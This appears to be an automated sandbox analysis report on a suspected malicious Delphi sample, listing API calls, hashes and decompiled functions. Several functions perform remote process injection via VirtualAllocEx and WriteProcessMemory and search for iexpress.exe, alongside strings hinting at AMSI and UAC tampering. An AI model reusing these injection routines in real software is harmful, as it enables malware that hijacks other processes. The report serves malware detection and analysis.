                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02515E66
                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02515EAD
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02515EBD
                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02515EE5
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02515EF5
                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02515F1B
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02515F2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                • API String ID: 1599918012-2375825460
                                                                • Opcode ID: ce2ff861a8847cbd52f8eb7497b8c674a4da7b805932cba2d130268b09d95d30
                                                                • Instruction ID: d261e1388342a62137d07a609d21e738c7401146d0c1b9b1a2b4d39e494f03d9
                                                                • Opcode Fuzzy Hash: ce2ff861a8847cbd52f8eb7497b8c674a4da7b805932cba2d130268b09d95d30
                                                                • Instruction Fuzzy Hash: 5931C771E5021D2AFB25D6B4DC85FDE7BADAB84380F4441E1A308E6080E774DE84CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E025245F8(CHAR* __eax) {
                                                                				char _v280;
                                                                				intOrPtr _v308;
                                                                				void* _t12;
                                                                				CHAR* _t13;
                                                                				intOrPtr _t14;
                                                                				struct tagPROCESSENTRY32W _t15;
                                                                
                                                                				_t13 = __eax;
                                                                				_t14 = 0;
                                                                				_t12 = CreateToolhelp32Snapshot(2, 0);
                                                                				if(_t12 != 0xffffffff) {
                                                                					 *_t15 = 0x128;
                                                                					if(Process32First(_t12, _t15) == 0) {
                                                                						L5:
                                                                						_t14 = 0;
                                                                						CloseHandle(_t12);
                                                                					} else {
                                                                						while(lstrcmpiA( &_v280, _t13) != 0) {
                                                                							if(Process32Next(_t12, _t15) != 0) {
                                                                								continue;
                                                                							} else {
                                                                								goto L5;
                                                                							}
                                                                							goto L6;
                                                                						}
                                                                						_t14 = _v308;
                                                                						CloseHandle(_t12);
                                                                					}
                                                                				}
                                                                				L6:
                                                                				return _t14;
                                                                			}










                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02524609
                                                                • Process32First.KERNEL32(00000000), ref: 0252461E
                                                                • lstrcmpiA.KERNEL32(?,iexpress.exe,?,?,?,0252950E,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString,0252AD5C), ref: 0252462D
                                                                • CloseHandle.KERNEL32(00000000,?,iexpress.exe,?,?,?,0252950E,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString), ref: 0252463B
                                                                • Process32Next.KERNEL32 ref: 02524644
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,0252950E,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString,0252AD5C,UacInitialize), ref: 02524650
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32lstrcmpi
                                                                • String ID: iexpress.exe
                                                                • API String ID: 3122021977-710937349
                                                                • Opcode ID: 23bb1a003d9cc1d5a696eb2cb7ea938dafb97af319166b9ccbc4cd7e1c885131
                                                                • Instruction ID: 4d84f8062920dd6a5c5b6375d3abe44b53fd77fbcb0632618fea05d49d0d0c3c
                                                                • Opcode Fuzzy Hash: 23bb1a003d9cc1d5a696eb2cb7ea938dafb97af319166b9ccbc4cd7e1c885131
                                                                • Instruction Fuzzy Hash: 36F0E96260133132D6206275CC85F9B698DBFC73B8F050A14B9559B1C1FA28D40886AD
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 66%
                                                                			E02523F94(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0) {
                                                                				intOrPtr _v8;
                                                                				char _v9;
                                                                				char _v32;
                                                                				intOrPtr _t20;
                                                                				intOrPtr _t22;
                                                                				void* _t31;
                                                                				intOrPtr _t41;
                                                                				intOrPtr _t43;
                                                                				intOrPtr _t51;
                                                                				intOrPtr _t58;
                                                                				intOrPtr _t59;
                                                                				intOrPtr _t60;
                                                                				long _t61;
                                                                				void* _t66;
                                                                				intOrPtr _t69;
                                                                				void* _t78;
                                                                
                                                                				_t78 = __fp0;
                                                                				_push(0);
                                                                				_push(0);
                                                                				_push(0);
                                                                				_push(0);
                                                                				_push(0);
                                                                				_push(0);
                                                                				_push(0);
                                                                				_v8 = __edx;
                                                                				_t66 = __eax;
                                                                				_push(_t69);
                                                                				_push(0x25240da);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t69;
                                                                				_v9 = 0;
                                                                				 *0x256d334 =  *((intOrPtr*)(_v8 + 0x3c)) + _v8;
                                                                				 *0x256d33c = 0x50000000;
                                                                				do {
                                                                					 *0x256d33c =  *0x256d33c + 0x10000;
                                                                					_t20 =  *0x256d334; // 0x0
                                                                					_t22 =  *0x256d334; // 0x0
                                                                					 *0x256d338 = VirtualAlloc( *((intOrPtr*)(_t22 + 0x34)) +  *0x256d33c,  *(_t20 + 0x50), 0x3000, 0x40);
                                                                					if( *0x256d338 != 0) {
                                                                						VirtualFree( *0x256d338, 0, 0x8000);
                                                                						_t41 =  *0x256d334; // 0x0
                                                                						_t43 =  *0x256d334; // 0x0
                                                                						 *0x256d338 = VirtualAllocEx(_t66,  *((intOrPtr*)(_t43 + 0x34)) +  *0x256d33c,  *(_t41 + 0x50), 0x3000, 0x40);
                                                                					}
                                                                				} while ( *0x256d338 == 0 &&  *0x256d33c <= 0x30000000);
                                                                				E025243F8(_t66, 0x256d338, _v8,  *0x256d338, 0x256d33c, _t66, _t78,  &_v32);
                                                                				_t51 =  *0x2523864; // 0x2523868
                                                                				E025155FC(0x256d31c, _t51,  &_v32);
                                                                				_t31 =  *0x256d31c; // 0x0
                                                                				if(_t31 != 0) {
                                                                					 *0x256d340 = _t31;
                                                                					_t60 =  *0x256d328; // 0x0
                                                                					 *0x256d344 = _t60;
                                                                					_t61 =  *0x256d320; // 0x0
                                                                					WriteProcessMemory(_t66,  *0x256d338, _t31, _t61, 0x256d330);
                                                                					 *0x256d348 = E02523DDC(_t66, 0x256d340, E02523F6C, 0, 8);
                                                                					if( *0x256d348 != 0) {
                                                                						_v9 = 1;
                                                                					}
                                                                				}
                                                                				_pop(_t58);
                                                                				 *[fs:eax] = _t58;
                                                                				_push(E025240E1);
                                                                				_t59 =  *0x2523864; // 0x2523868
                                                                				return E02515398( &_v32, _t59);
                                                                			}




















                                                                APIs
                                                                • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,025240DA,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02523FF9
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040,00000000,025240DA,?,?,?,?,00000000,00000000,00000000), ref: 0252400F
                                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040,00000000,025240DA), ref: 02524030
                                                                • WriteProcessMemory.KERNEL32(?,00000000,00000000,00000000,0256D330,?,?,?,00003000,00000040,00000000,025240DA), ref: 02524092
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 2022580353-0
                                                                • Opcode ID: 94fe4da41f4b0588800e95376328d19c44e597cebe2479fedcad02b606b902a7
                                                                • Instruction ID: 7b12422df6dde1c5f90ef5929a20ff0c0cb6bdf1402a59b3dabab76242f6995b
                                                                • Opcode Fuzzy Hash: 94fe4da41f4b0588800e95376328d19c44e597cebe2479fedcad02b606b902a7
                                                                • Instruction Fuzzy Hash: A7414770B52210AFE714CF5CC989F6A77F9FB8A700F5948A4E8009B280D378A8598B59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 56%
                                                                			E02523D14(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                                				long _v8;
                                                                				char _v12;
                                                                				char _v16;
                                                                				intOrPtr _t11;
                                                                				char _t16;
                                                                				void* _t25;
                                                                				intOrPtr _t33;
                                                                				void* _t36;
                                                                				void* _t38;
                                                                				intOrPtr _t41;
                                                                
                                                                				_push(0);
                                                                				_push(0);
                                                                				_push(0);
                                                                				_t25 = __edx;
                                                                				_t38 = __eax;
                                                                				_push(_t41);
                                                                				_push(0x2523d9a);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t41;
                                                                				E02514A98( &_v12, __edx);
                                                                				_t11 = _v12;
                                                                				if(_t11 != 0) {
                                                                					_t11 =  *((intOrPtr*)(_t11 - 4));
                                                                				}
                                                                				_t36 = VirtualAllocEx(_t38, 0, _t11 + 1, 0x3000, 0x40);
                                                                				E02514A98( &_v16, _t25);
                                                                				_t16 = _v16;
                                                                				if(_t16 != 0) {
                                                                					_t16 =  *((intOrPtr*)(_t16 - 4));
                                                                				}
                                                                				WriteProcessMemory(_t38, _t36, _t25, _t16 + 1,  &_v8);
                                                                				_pop(_t33);
                                                                				 *[fs:eax] = _t33;
                                                                				_push(E02523DA1);
                                                                				return E025148C4( &_v16, 2);
                                                                			}














                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,02523D9A,?,?,?,?,00000000,00000000,00000000), ref: 02523D54
                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,00000000,02523D9A), ref: 02523D7A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                • String ID:
                                                                • API String ID: 645232735-0
                                                                • Opcode ID: 8be46509de255c9d1771f0b6fdd3927ebb4ac8043a8480a191f13cbaf45179c2
                                                                • Instruction ID: 1aa1bf5fdb8d1e2f84886fc0739fc2438e85ba612f5029d66827ed05ca3f9655
                                                                • Opcode Fuzzy Hash: 8be46509de255c9d1771f0b6fdd3927ebb4ac8043a8480a191f13cbaf45179c2
                                                                • Instruction Fuzzy Hash: F001DE317002157FF710DA61CC41FAEBBADEB86B40F5140B5F901EB2C0D678EE058A28
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 82%
                                                                			E02523DAC(void* __eax, long __ecx, void* __edx) {
                                                                				void* _t5;
                                                                				void* _t9;
                                                                				long _t10;
                                                                				void* _t11;
                                                                				SIZE_T* _t12;
                                                                
                                                                				_push(__ecx);
                                                                				_t10 = __ecx;
                                                                				_t11 = __edx;
                                                                				_t5 = __eax;
                                                                				_t9 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40);
                                                                				WriteProcessMemory(_t5, _t9, _t11, _t10, _t12);
                                                                				return _t9;
                                                                			}









                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,02523DF4), ref: 02523DC2
                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,02523DF4), ref: 02523DCE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                • String ID:
                                                                • API String ID: 645232735-0
                                                                • Opcode ID: 2cd24f3412cda8af88afa488e7603ac8d661d4c6e5d900769bf4ba982289be09
                                                                • Instruction ID: 229121def21944372b031dad170760fc7dd014707a0ceb33782b05f7648905ba
                                                                • Opcode Fuzzy Hash: 2cd24f3412cda8af88afa488e7603ac8d661d4c6e5d900769bf4ba982289be09
                                                                • Instruction Fuzzy Hash: CFD09EA674722437E134216BAC45FA75E4DCBC77F5E1501B6F708EA1C1D4965C0541B8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E02518252(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                				long _v8;
                                                                				long _v12;
                                                                				long _v16;
                                                                				long _v20;
                                                                				intOrPtr _v24;
                                                                				signed int _v28;
                                                                				CHAR* _t25;
                                                                				int _t26;
                                                                				intOrPtr _t31;
                                                                				intOrPtr _t34;
                                                                				intOrPtr* _t39;
                                                                				intOrPtr* _t40;
                                                                				intOrPtr _t48;
                                                                				intOrPtr _t50;
                                                                
                                                                				_t25 = _a4;
                                                                				if(_t25 == 0) {
                                                                					_t25 = 0;
                                                                				}
                                                                				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                                				_v28 = _v8 * _v12;
                                                                				_v24 = 0;
                                                                				_t48 = _v24;
                                                                				_t31 = E02515824(_v28, _t48, _v16, 0);
                                                                				_t39 = _a8;
                                                                				 *_t39 = _t31;
                                                                				 *((intOrPtr*)(_t39 + 4)) = _t48;
                                                                				_t50 = _v24;
                                                                				_t34 = E02515824(_v28, _t50, _v20, 0);
                                                                				_t40 = _a12;
                                                                				 *_t40 = _t34;
                                                                				 *((intOrPtr*)(_t40 + 4)) = _t50;
                                                                				return _t26;
                                                                			}


















                                                                APIs
                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02518275
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DiskFreeSpace
                                                                • String ID:
                                                                • API String ID: 1705453755-0
                                                                • Opcode ID: 2527c2e550787c50034af577a7ac8c6a75ac3b9f005c29b6c5fd5aa65144798f
                                                                • Instruction ID: c1c60b2177dfc4d4ab3b163ca15e0e6358e21712e75acca24cb12dfa1aaf2adc
                                                                • Opcode Fuzzy Hash: 2527c2e550787c50034af577a7ac8c6a75ac3b9f005c29b6c5fd5aa65144798f
                                                                • Instruction Fuzzy Hash: 1A11D2B5E00209AF9B44CF99C881DAFF7F9FFC8710B54C569A515EB254E6319E01CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0251A9D0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                                				char _v260;
                                                                				int _t5;
                                                                				intOrPtr _t10;
                                                                				void* _t18;
                                                                
                                                                				_t18 = __ecx;
                                                                				_t10 = _a4;
                                                                				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
                                                                				_t19 = _t5;
                                                                				if(_t5 <= 0) {
                                                                					return E025148F4(_t10, _t18);
                                                                				}
                                                                				return E02514990(_t10, _t5 - 1,  &_v260, _t19);
                                                                			}








                                                                APIs
                                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0251A9EE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                • Opcode ID: f018570b5655bc878a934e5041b7a516a4510c90cded3bf1548f5733b6c703d6
                                                                • Instruction ID: ccd561dba8cd0024be9bad957b946762cf024689fb87f6c331da4ac23fe8d7c8
                                                                • Opcode Fuzzy Hash: f018570b5655bc878a934e5041b7a516a4510c90cded3bf1548f5733b6c703d6
                                                                • Instruction Fuzzy Hash: F3E0D87170021427E311A55CDC809FA735DBB98310F00017BB904C7380FDB0DD848AED
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0251B950() {
                                                                				char _v128;
                                                                				intOrPtr _v132;
                                                                				signed int _v136;
                                                                				intOrPtr _v140;
                                                                				intOrPtr _v144;
                                                                				int _t7;
                                                                				struct _OSVERSIONINFOA* _t18;
                                                                
                                                                				_t18->dwOSVersionInfoSize = 0x94;
                                                                				_t7 = GetVersionExA(_t18);
                                                                				if(_t7 != 0) {
                                                                					 *0x252d7e4 = _v132;
                                                                					 *0x252d7e8 = _v144;
                                                                					 *0x252d7ec = _v140;
                                                                					if( *0x252d7e4 != 1) {
                                                                						 *0x252d7f0 = _v136;
                                                                					} else {
                                                                						 *0x252d7f0 = _v136 & 0x0000ffff;
                                                                					}
                                                                					return E02514B10(0x252d7f4, 0x80,  &_v128);
                                                                				}
                                                                				return _t7;
                                                                			}











                                                                APIs
                                                                • GetVersionExA.KERNEL32(?,0252C106,00000000,0252C11E), ref: 0251B95E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID:
                                                                • API String ID: 1889659487-0
                                                                • Opcode ID: 5e15e480d2339c5a0ab771d07fc057048f1225c943d7dcd42d86c8d401f13c00
                                                                • Instruction ID: 2b28f703d6a2aff5b5746decdcd5473e701d2a07ccc6b6c25161c1385419cf59
                                                                • Opcode Fuzzy Hash: 5e15e480d2339c5a0ab771d07fc057048f1225c943d7dcd42d86c8d401f13c00
                                                                • Instruction Fuzzy Hash: 0CF0F4B4A053028FD364DF28E540B15B7F0FB8A308F094D29A498C7388D738841EDB5A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 79%
                                                                			E0251AA1C(int __eax, signed int __ecx, int __edx) {
                                                                				char _v16;
                                                                				signed int _t5;
                                                                				signed int _t6;
                                                                
                                                                				_push(__ecx);
                                                                				_t6 = __ecx;
                                                                				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                                                                					_t5 = _t6;
                                                                				} else {
                                                                					_t5 = _v16 & 0x000000ff;
                                                                				}
                                                                				return _t5;
                                                                			}







                                                                APIs
                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0251C036,00000000,0251C24F,?,?,00000000,00000000), ref: 0251AA2F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                • Opcode ID: ee0b552feaacc8f8dd4fbef7b7a7d3414b5f3114e3be43053c5a9c5dca89adda
                                                                • Instruction ID: 2ef78e268492360b748ef5d38ce44a908b57b56b4a083ddbce0d035409e94b04
                                                                • Opcode Fuzzy Hash: ee0b552feaacc8f8dd4fbef7b7a7d3414b5f3114e3be43053c5a9c5dca89adda
                                                                • Instruction Fuzzy Hash: 16D05EA234E2603AB221515A6E84D7B5ADCDAC57B1F04443AF648C6241D210CC06E6B5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E02519450() {
                                                                				struct _SYSTEMTIME* _t2;
                                                                
                                                                				GetLocalTime(_t2);
                                                                				return _t2->wYear & 0x0000ffff;
                                                                			}




                                                                0x02519454
                                                                0x02519460

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID:
                                                                • API String ID: 481472006-0
                                                                • Opcode ID: 03fe08655c98b4df5ce1893cbd2058f766e1102da1784216b5b85247ca1c748c
                                                                • Instruction ID: acd4d98e93b090bb02e1841dacad9851e6e4c368538355c69837a1055a8986e6
                                                                • Opcode Fuzzy Hash: 03fe08655c98b4df5ce1893cbd2058f766e1102da1784216b5b85247ca1c748c
                                                                • Instruction Fuzzy Hash: 1DA0120080482111914033184C0213530846840630FC40B4068F8402D0E91D8170D4D7
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 51%
                                                                			E025120F4(void* __eax, char* __edx) {
                                                                				char* _t103;
                                                                
                                                                				_t103 = __edx;
                                                                				_t39 = __eax + 1;
                                                                				 *__edx = 0xffffffff89705f71;
                                                                				asm("sbb edi, 0xffffffff");
                                                                				 *__edx = 0xbadbbd;
                                                                				asm("sbb edi, 0xffffffff");
                                                                				 *__edx = 0xbadbbd;
                                                                				asm("sbb edi, 0xffffffff");
                                                                				 *__edx = 0xbadbbd;
                                                                				asm("sbb edi, 0xffffffff");
                                                                				 *__edx = 0xbadbbd;
                                                                				asm("sbb edi, 0xffffffff");
                                                                				 *__edx = 0xbadbbd;
                                                                				asm("sbb edi, 0xffffffff");
                                                                				 *__edx = 0xbadbbd;
                                                                				asm("sbb edi, 0xffffffff");
                                                                				 *__edx = 0xbadbbd;
                                                                				asm("sbb edi, 0xffffffff");
                                                                				 *__edx = 0xbadbbd;
                                                                				asm("sbb edi, 0xffffffff");
                                                                				 *__edx = ((((((((((__eax + 0x00000001) * 0x89705f41 >> 0x00000020 & 0x1fffffff) + 0xfffffffe25c17d04 + (_t39 * 0x89705f41 >> 0x0000001e) & 0x0fffffff) + 0xfffffffe25c17d04 & 0x07ffffff) + 0xfffffffe25c17d04 & 0x03ffffff) + 0xfffffffe25c17d04 & 0x01ffffff) + 0xfffffffe25c17d04 & 0x00ffffff) + 0xfffffffe25c17d04 & 0x007fffff) + 0xfffffffe25c17d04 & 0x003fffff) + 0xfffffffe25c17d04 & 0x001fffff) + 0xfffffffe25c17d04 >> 0x00000014 | 0x00000030;
                                                                				_t37 = _t103 + 1; // 0x1
                                                                				return _t37;
                                                                			}





                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0251D470() {
                                                                				struct HINSTANCE__* _v8;
                                                                				intOrPtr _t46;
                                                                				void* _t91;
                                                                
                                                                				_v8 = GetModuleHandleA("oleaut32.dll");
                                                                				 *0x256d224 = E0251D444("VariantChangeTypeEx", E0251CFDC, _t91);
                                                                				 *0x256d228 = E0251D444("VarNeg", E0251D00C, _t91);
                                                                				 *0x256d22c = E0251D444("VarNot", E0251D00C, _t91);
                                                                				 *0x256d230 = E0251D444("VarAdd", E0251D018, _t91);
                                                                				 *0x256d234 = E0251D444("VarSub", E0251D018, _t91);
                                                                				 *0x256d238 = E0251D444("VarMul", E0251D018, _t91);
                                                                				 *0x256d23c = E0251D444("VarDiv", E0251D018, _t91);
                                                                				 *0x256d240 = E0251D444("VarIdiv", E0251D018, _t91);
                                                                				 *0x256d244 = E0251D444("VarMod", E0251D018, _t91);
                                                                				 *0x256d248 = E0251D444("VarAnd", E0251D018, _t91);
                                                                				 *0x256d24c = E0251D444("VarOr", E0251D018, _t91);
                                                                				 *0x256d250 = E0251D444("VarXor", E0251D018, _t91);
                                                                				 *0x256d254 = E0251D444("VarCmp", E0251D024, _t91);
                                                                				 *0x256d258 = E0251D444("VarI4FromStr", E0251D030, _t91);
                                                                				 *0x256d25c = E0251D444("VarR4FromStr", E0251D09C, _t91);
                                                                				 *0x256d260 = E0251D444("VarR8FromStr", E0251D108, _t91);
                                                                				 *0x256d264 = E0251D444("VarDateFromStr", E0251D174, _t91);
                                                                				 *0x256d268 = E0251D444("VarCyFromStr", E0251D1E0, _t91);
                                                                				 *0x256d26c = E0251D444("VarBoolFromStr", E0251D24C, _t91);
                                                                				 *0x256d270 = E0251D444("VarBstrFromCy", E0251D2CC, _t91);
                                                                				 *0x256d274 = E0251D444("VarBstrFromDate", E0251D33C, _t91);
                                                                				_t46 = E0251D444("VarBstrFromBool", E0251D3B0, _t91);
                                                                				 *0x256d278 = _t46;
                                                                				return _t46;
                                                                			}







                                                                APIs
